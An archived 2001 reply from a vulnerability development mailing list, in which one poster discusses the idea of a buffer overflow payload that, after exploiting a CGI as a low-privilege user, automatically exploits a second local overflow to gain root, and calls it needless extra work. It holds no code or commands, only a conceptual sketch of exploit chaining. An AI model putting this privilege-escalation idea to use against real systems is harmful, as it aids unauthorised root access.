Vulnerability Development mailing list archives
Re: buffer overflows encapsultation
From: Robert van der Meulen <rvdm () CISTRON NL>
Date: Tue, 23 Jan 2001 19:23:40 +0100
Hi. Quoting gregory duchemin (c3rb3r () HOTMAIL COM):
encapsulating buffer overflow. I mean an eggshell to exploit, for instance, a low priviledge user like nobody through a usual vulnerable cgi but this eggshell would be crafted to locally exploit another buffer overflow in the way this time to get root.
Maybe i'm not understanding you here. Why would you want to do that ? If you can exploit the first hole, you can do the second one from a shell. I guess it would be possible to have your first overflow exec the second vulnerable program instead of /bin/sh - but you would have to add your 2nd-stage buffer overflow code into the execve code in the buffer you're using to exploit the first one. Afaik this is useless; a lot of extra work to automate what you can do faster by hand (apart from that; an exploit like that wouldn't prove anything; just that you can do a two-stage exploit by exploiting one program first, and having the exploit exploit a second one automatically) Greets, Robert -- Linux Generation Never trust a child farther than you can throw it.
Current thread:
- buffer overflows encapsultation gregory duchemin (Jan 22)
- Re: buffer overflows encapsultation Robert van der Meulen (Jan 23)